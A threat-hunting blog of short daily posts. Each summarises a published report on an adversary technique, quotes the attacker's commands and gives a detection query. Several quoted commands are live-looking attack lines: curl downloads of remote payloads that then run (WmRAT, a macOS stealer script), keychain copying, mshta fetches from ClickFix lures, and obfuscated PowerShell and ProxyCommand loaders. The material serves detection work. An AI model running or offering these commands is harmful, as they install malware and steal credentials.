Know Your Adversary

Hello everyone! Another day - another interesting technique. Today we'll look how adversaries, possible APT32 , abuse MST transforms to drop malware to the compromised system. The threat actors distribute ISO files with an LNK file with double extension (pdf.lnk), and two hidden files - an MSI installer and an MST file. The LNK runs the following command: "C:\Windows\System32\msiexec.exe" /qn /i WindowsPCHealthCheckSetup.msi TRANSFORMS=5ACXP.mst As the result, a legitimate PcHealthCheck executable along with the malicious tbs.dll dropped by the MST transform under %LocalAppData%\PCHealthCheck\ . Can we hunt for suspicious MST transforms? Of course! For example: event_type: "processcreatewin" AND proc_file_name: "msiexec.exe" AND cmdline: "TRANSFORMS" See you tomorrow!

Hello everyone! Let's look at another file type you don't often see attached to phishing emails. I'm talking about IQY file extension. It's an Internet Query file, which is a text file that Microsoft Excel uses to download data from the internet. I spotted it in this report on Bitter APT by EclecticIQ. Upon opening the file, Security Brief Report.iqy, the following command is executed: cmd|' /c cd C:\\programdata & set /P=\"MZ\"<nul>b1 & curl -o b2 https://fogomyart[.]com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'!A0 The command abuses cURL to download WmRAT from a remote server, and executes it. For example, we can hunt for IQY files spawning commands, which include cURL: event_type: "processcreatewin" AND proc_p_cmdline: "iqy" AND cmdline: "curl" See you tomorrow!

Hello everyone! Let's talk a bit about threat actors' infrastructure. As you know, adversaries need to store malicious files somewhere in order to distribute them. Of course, they can use their own infrastructure, but in many cases they opt to freely available variants. For example, APT41  (we track this cluster as Wanted Werewolf ). The threat actors abused various free web hosting tools for distributing their malware. What does it mean? We can use it for hunting: event_type: "dnsreq" AND dns_rname: ("workers.dev" OR "trycloudflare.com" OR "infinityfreeapp.com") What's more, the threat actors Google Calendar for C2! See you tomorrow!

Hello everyone! Adversaries always abuse Base64 to conseal malicious scripts. For example, abusing PowerShell or Python. But what about other encoding schemes? Let's look inside this report. The threat actors executed the Python Launcher, py.exe , with an obfuscated Python command as an argument: "C:/winsystem/py/py.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('[redacted]')))) A Base85-encoded string is decoded, decompressed, deserialized, and then executed as Python code. As Base85 isn't very common in modern environments, we can use it to build our hunting query: event_type: "processcreatewin" AND cmdline: "b85decode" See you tomorrow!

Hello everyone! We see lots of stealers for Windows. But what about macOS? Recently  MalwareHunterTeam shared information on an interesting macOS malware sample. The sample abuses cURL to download a script from a remote server: curl -sfo /tmp/up.sh https://www.appleprocesshub[.]com/fSidEOWW.sh && chmod 777 /tmp/up.sh && sh /tmp/up.sh The adversary uses notable command ine parameters to execute cURL, including -s (silent mode) and -f (fail silently). We can use it to build a hunting query: event_type: "processcreatemac" AND proc_file_name: "curl" AND cmdline: "sfo" The script collects system information as well as sensitive data, including the keychain, for example: cp /Users/root/Library/Keychains/Login.keychain-db /tmp/20250516021858/VMQFcNm+96F/.keychain-db This procedure can be also used to build a query: event_type: "processcreatemac" AND proc_file_name: "cp" AND cmdline: "keychain" Collected data is arc...

Hello everyone! As you know, stealers are the most common threats nowadays. What does it mean? Threat actors find new and new ways to deliver it to the target system. Let's look at  Rhadamanthys campaign uncovered by  Cybereason . The adversary abused a renamed Haihaisoft PDF Reader executable (for example, Preuve de la violation.pdf .exe ) to sideload a malicious DLL ( msimg32.dll ), which which enabled persistence and downloaded the stealer payload. As we're dealing with a renamed exacutable, we can use it to build our detection logic: event_type: "processcreatewin" AND proc_file_originalfilename: "hpreader.exe" AND NOT proc_file_name: "hpreader.exe" See you tomorrow!

Hello everyone! I think you at least heard about fake CAPTCHA attacks. Yes, ClickFix again. The thing is - adversaries use fake CAPTCHA pages to trick users into executing malicious commands in Windows. These pages mimic a legitimate human verification prompt and instruct users to paste a malicious command into the Run dialog (Win + R) as part of the “verification” process. This Trend Micro report provides lots of examples of these commands we can use to build detections: mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203 mshta.exe hxxps://zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com/DPST_doc.mp3 #  ''Ι am nοt a rοbοt: САРТСНА Verification UID: 815403 mshta.exe hxxp://ok[.]fish-cloud-jar[.]us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S" mshta.exe hxxps://x63-hello[.]live/nF3mXcQ9FVjs1sMt[.]html #'' I'm human ID241619'' cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQ...

Hello everyone! Yes, looks like we can talk about PowerShell abuse forever! For example, adversaries often try to obfuscate malicious PowerShell scripts. Let's look at an example : $udVDkdtSF =([regex]::Matches('6b677a6a767672382d2d63606b6c65766d6c2f63767272632c6d70652d7460712d6c6d636c766b2f746f2c606376264f5854557a5146223f2226676c7438437272466376633964776c61766b6d6c226d714144696b48432a26765341542e22264a6a61752b796177706e222676534154222f6d22264a6a61757f3964776c61766b6d6c2271504a4764562a2b7964776c61766b6d6c22537a68634147402a264e46776e755074587a2b796b642a232a566771762f5263766a222f5263766a22264a6a61752b2b796d714144696b484322264e46776e755074587a22264a6a61757f7f264a6a6175223f2226676c743843727246637663222922255e6c6d636c766b2f746f2c6063762539537a686341474022267766544669667651442c5177605176706b6c652a312e36312b39717663707622264a6a6175397f71504a47645639','.{2}') | % { [char]([Convert]::ToByte($_.Value,16) -bxor '2') }) -join '';& $udVDkdtSF.Substring(0,3) $...

Hello everyone! One more interesting technique covered in Sophos report - abusing Qemu emulator to run a Windows 7 virtual machine with a  QDoor trojan pre-installed. The adversary executed the following command: “C:\ProgramData\UpdatePackage_excic\wexe” -m 4096 – hda Update_excic.acow2 – netdev user,id=myneto -device e1000,netdev=mynetO – cpu max – display none As you can see, the virtual machine is connected to the targeted system’s network interface. Of course, we can use it for hunting: event_type: "processcreatewin" AND proc_file_productname: "qemu" AND cmdline: "netdev" See you tomorrow!

Hello everyone! If you looked through the report I shared yesterday, you should have spotted another interesting legitimate tool abused by threat actors. This time it's an RMM called  Syncro Live Agent . It's interesting that, according to the report, the agent was never used by the adversary. But it doesn't mean we shouldn't detect it! We can use a very simple query to hunt for the tool, for example: event_type: "processcreatewin" AND proc_file_productname: "syncrolive" Yes, that easy! See you tomorrow!

Hello everyone! Let's keep digging into ransomware affiliates' toolkit. And this time we'll focus on data exfiltration stage. According to Sophos report , 3AM ransomware affiliates leveraged a legitimate tool called GoodSync : "On two hosts, the threat actor installed a legitimate cloud synchronization tool called GoodSync, which is compatible with Microsoft, Google, Amazon, Dropbox, and other services. They then used GoodSync to upload approximately 868 GB of data from those servers to the cloud storage provider Backblaze." Transferring data to cloud storage is quite common tactic, but adversaries always experiment with their toolset. As always, we can hunt for execution events related to the tool: event_type: "processcreatewin" AND proc_file_productname: "goodsync" Report contains lots of interesting behavior markers, make sure to check it! See you tomorrow!

Hello everyone! Adversaries always try to masquerade malicious files to look like absolutely legitimate. Today we'll look at Adwind campaign, which was reported by CERT-AGID . So, the malicious JAR file was disguised to look like an image: "C:\Users\Public\InvoiceXpress\bin\java.exe" -jar -noverify "C:\Users\Public\InvoiceXpress\bin\InvoiceXpress.png" It makes malicious file look like legitimate, but at the same time provides us detection opportunities! For example: event_type: "processcreatewin" AND proc_file_name: "java.exe" AND cmdline: "png" Of course, you can experiment with file extensions, as well as executables, for example, you can hunt for rundll32.exe and regsvr32.exe . See you tomorrow!

Hello everyone! We know a lot about LOLBAS . But we usually see only some of them used ITW. So I always excited to see not so common examples. Today we'll look at two examples,  esentutl.exe and extrac32.exe , as seen in this report on DBatLoader . Both executables are used to copy legtimate command and scripting interpreters - Windows Command Shell and PowerShell. The first example is related to Windows Command Shell: esentutl /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o We can use it to build the query: event_type: "processcreatewin" AND proc_file_name: "esentutl.exe" AND cmdline: ("cmd.exe" OR "powershell.exe") The second is related to PowerShell: extrac32.exe /C /Y C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\xkn.pif Here we can use a very similar query: event_type: "processcreatewin" AND proc_file_name: "extrac32.exe" AND cmdline: ("cmd.exe" OR "powershell...

Hello everyone! Adversaries often abuse legitimate file transfer sites, both for data exfiltration and ingress tool transfer. For example, Scattered Spider (Muddled Libra, 0ktapus, Scatter Swine, UNC3944). According to Unit42 report , the threat actors leveraged the following file transfer sites: put[.]io , transfer[.]sh , wasabi[.]com , gofile[.]io . As always, we can use it to build our hunting query, for example: event_type: dnsreq* AND dns_rname: ("put.io" OR "transfer.sh" OR "wasabi.com" OR "gofile.io") See you tomorrow!

Hello everyone! Reading various reports, I see adversaries abuse mshta.exe again and again. Very often I see them leverage it to execute a remotly hosted malicious .hta file. Here's a recent example from Qualys report: "C:\Windows\system32\mshta.exe" httpS://mytaxclientcopy[.]com/xlab22.hta Should we have hunting queries for similar activity? Of course! Yes, because not all .hta files executed from remote hosts are malicious. Anyway, you should not have too many hits. To build our hunting query, we can use, for example, " http " and " https " keywords: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https") See you tomorrow!

Hello everyone! I'm sure you know that threat actors always need to collect information about the compromised system. In most cases it happens at early stages of attack lifecycle, so it's always great to have related hunting queries. Let's look at the following example related to TA406 : $rc = Get-ChildItem ([Environment]::GetFolderPath('Recent')) $ic = ipconfig /all $gp = Get-process $antivirusInfo = GetWmiObject -Namespace "root\SecurityCenter2" -Class AntivirusProduct $anvi = $antivirusInfo | Select-Object DisplayName, ProductState, PathToSignedProductExe $db = GetDisk | Get-Partition | Select-Object DiskNumber, DriveLetter As you can see, the adversary collects information on recent file names, processes, antivirus software. etc. All of this can be used during your hunting missions, of course! For example, as it's an excerpt from a PowerShell script, we can search for collecting information on recent file names in ScriptBlock: event_type: "Scr...

Hello everyone! Today I want to show you that your previously created hunting queries can cover many different threats. As you remember, we created the following query to hunt for suspicious .vbs -files in the startup folder: event_type: "processcreatewin" AND cmdline: ("startup" AND "vbs") We can use the same query to hunt for DarkCloud Stealer as it has a similar behavior marker: wscript.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" Another interesting marker related to this threat is abusing showip[.]net to check for the victim’s public IP address: event_type: "dnsreqwin" AND dns_rname: "showip.net" See you tomorrow!

Hello everyone! I know you enjoy AV\EDR killers, so I decided to share information on another one with you! For example, this tool was used by Earth Ammit . I'm talking about  TrueSightKiller . Just like many other EDR killers, this one creates typical artifacts we can use for detection. For example, it loads  truesight.sys driver. We can use it to build our query: event_type: "driverloadwin" AND file_name: "truesight.sys" Another typical artifact - creating a new service: event_type: "serviceinstallwin" AND service_name: "TrueSight" And finally, executables' metadata, for example: event_type: "processcreatewin" AND proc_file_productname: "Truesight" See you tomorrow!

Hello everyone! Today we'll discuss a fresh report by Microsoft Threat Intelligence on  Marbled Dust . The adversary exploited a zero-day vulnerability in Output Messenger Server Manager (CVE-2025-27920). This directory traversal vulnerability enabled the threat actors to upload malicious files into the server’s startup directory. For example, the adversary dropped the malicious files OM.vbs and OMServerService.vbs to the Output Messenger server startup folder and dropped the malicious file OMServerService.exe to the server’s C:\Users\public\videos directory. First, we can hunt for suspicious .vbs files executed from the startup folder: event_type: "processcreatewin" AND cmdline: ("startup" AND "vbs") Second, we can hunt for suspicious files executed from C:\Users\public\videos: event_type: "processcreatewin" AND proc_file_path: "users\\public\\videos" See you tomorrow!

Hello everyone! Adversaries keep showing interest in legitimate tools, especially RMMs. Accoring to Cisco Talos report , the threat actors executed a spam campaign against Brazilian users, weaponizing  N‑sight RMM . It's interesting enough, that N-able also provides security solutions and MDR service. It makes such tools even more trusted. For example, the RMM agent currently has 0 detections on VirusTotal . For example, we can use product-related metadata to build our hunting query: event_type: "processcreatewin" AND proc_file_productname: "Advanced Monitoring Agent" Also, you may want to hunt for file creation event in related folders: event_type: "filecreatewin" AND file_path: "Advanced Monitoring Agent" See you tomorrow!

Hello everyone! Stealers are everywhere! And adversaries find new and new delivery methods. Today we'll look how the threat actors involved in Lumma Stealer distribution abuse SFTP. According to Sophos report , the threat actors distributed malicious LNK files disguised as PDF, which abused sftp.exe to execute an obfuscated command: C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]'  -replace ']') Just like in the case we discussed recently, the adversary leveraged ProxyCommand for proxy execution. And, of course, we can use it for hunting: event_type: "processcreatewin" AND proc_file_name: "sftp.exe" AND cmdline: "proxycommand" See you tomorrow!

Hello everyone! Adversaries always want to blend with the compromised environment. We already talked a lot about various legitimate tools abused by threat actors, but in many cases they don't even need to bring such tools. For example, according to Cisco Talos report , Cactus ransomware affiliates directed victims to initiate a Microsoft Quick Assist remote access session, and even helped them with installation of the program if not already presented on the user’s system. With proper baseline, such tools are great targets for threat hunting. The query may be as easy as the following: event_type: "processcreatewin" AND proc_file_name: "QuickAssist.exe" Hope your threat hunting missions are going well! See you tomorrow!

Hello everyone! Here's another curious case of legitimate software abuse. According to Synactiv report ,  Hunters International use  KickIdler , a legitimate employee monitoring software, to spy on the victim, perform reconnaissance and credential harvesting. This tool, for example, allows the threat actors to perform keylogging, screen capture, audio capture, enables remote control, and provides other interesting features from attacker's perspective. First of all, we can hunt for files with related signature: event_type: "processcreatewin" AND proc_file_sig: "TELE LINK SOFT (TLS) CY LTD" Next, we can hunt for related DNS queries: event_type: "dnsreqwin" AND dns_rname: "my.kickidler.com" You can also hunt for file creation events in the tool-related folders: event_type: "filecreatewin" AND file_path: "TeleLinkSoftHelper" See you tomorrow!

Hello everyone! I rarely see adversaries use malicious documents nowadays. But I see LNK files more and more often! Today we'll look at another example, which belongs to Charming Kitten (we track this activity cluster as Cypress Werewolf ). So, the malicious LNK file distributed by the threat actors contained the following command: conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length]...

Hello everyone! Let's keep looking at RMMs observed in ransomware gangs' toolkit. This time we'll look at Supremo . It's a legitimate remote access tool observed to be used by Black Basta ransomware affiliates ITW. Usually the adversary do not modify the binary, so it look absolutely legitimate. It means we can focus on metadata again and again. So here's the query: event_type: "processcreatewin" AND proc_file_productname: "Supremo Remote Control" The same can be said about file creation events in the tool-related folders: event_type: "filecreate" AND file_path: "SupremoRemoteDesktop" What other interesting RMMs used by ransomware affiliates you saw? See you tomorrow!

Hello everyone! Another day - another EDR bypass technique. In a recent report  Aon’s Stroz Friedberg Incident Response Team identified Bring Your Own Installer technique used by a threat actor to disable to bypass SentinelOne EDR. The adversary leveraged legitimate SentinelOne EDR installer to start the upgrade process of the agent, but interrupted it by terminating the msiexec.exe process associated with the SentinelOne version change. If still available, we can hunt for suspicious msiexec.exe termination events, for example, via taskkill : event_type: "processcreatewin" AND proc_file_name: "taskkill" AND cmdline: "msiexec" See you tomorrow!

Hello everyone! Yesterday we talked about some new tools developed by the threat actor known as Venom Spider . But let's talk a bit about some classic tools he's known for. I mean more_eggs backdoor. It's still used, for example, here's a fresh campaign covered by Arctic Wolf. I want to point out the following behavior marker -  msxsl.exe , a legitimate binary known as Microsoft’s Command Line Transformation Utility, is used to execute the backdoor: msxsl.exe D30F38D93CA9185.txt D30F38D93CA9185.txt We can use this marker to build our hunting query: event_type: "processcreatewin" AND proc_file_name: "msxsl.exe" AND cmdline: "txt" Have you observed msxsl.exe in your environment? See you tomorrow!

Hello everyone! Still adding interesting items to my PowerShell collection! So, in the morning I was reading this report , and spotted another ITW example of abusing PowerShell for timestomping. The adversary created scheduled tasks to execute MeshAgent , and after that executed PowerShell commands to timestomp related files, here are some examples: (Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140_1.dll”).LastWriteTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140_1.dll”).CreationTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140.dll”).LastAccessTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140.dll”).LastWriteTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140.dll”).CreationTime=(“12 May 2024 11:14:00”) For example, we can use ScriptBlock event to hunt for Get-Item cmdlet abuse: event_type: "ScriptExecutionWin" AND script_text: "get-item" AND ("lastaccesstime" OR "lastwr...

Hello everyone! Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger . Both were attributed to the threat actor known as  Golden Chickens . The adversary provides tools to other criminals operating a Malware-as-a-Service (MaaS) platform. I've looked through the report, and (as always) caught a few detection and hunting opportunities. For example, the adversary abused ssh.exe for proxying PowerShell execution: ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')" We can hunt for similar activity using the following query: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand" Next thing, abusing regsvr32.exe for executing a malicious OCX file: regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx We can use the following query to hunt for OCX...

Hello everyone! We already talked about how adversaries abuse PowerPoint to deliver malware a few times . It's to discuss it again! Seqrite has published a report on APT36 (we track this activity cluster as  Translucent Werewolf )   activity. According to this research, the threat actors leveraged PowerPoint add-on files (PPAM) to deliver Crimson RAT . My observations suggest that such files are not very common in modern environments, so we can hunt for PPAM opening events: event_type: "processcreatewin" AND proc_file_name: "powerpnt.exe" AND cmdline: "ppam" See you tomorrow!

Hello everyone! Reading Trend Micro's report on Earth Kasha , I spotted a curious behavior marker of  ROAMINGMOUSE : it abuses WMI to execute JSLNTOOL.EXE via explorer.exe .  JSLNTOOL.EXE is a legitimate application used by the adversary to sideload  JSFC.dll - a malicious loader. It means we can hunt for suspicious executions of explorer.exe via wmiprvse.exe : event_type: "processcreatewin" AND proc_file_path: "explorer.exe" AND proc_p_file_path: "wmiprvse.exe" As for  JSLNTOOL.EXE , you can also hunt for related execution events, focusing on uncommon locations: event_type: "processcreatewin" AND proc_file_originalfilename: "jslntool.exe" AND NOT proc_file_path: "justsystems" See you tomorrow!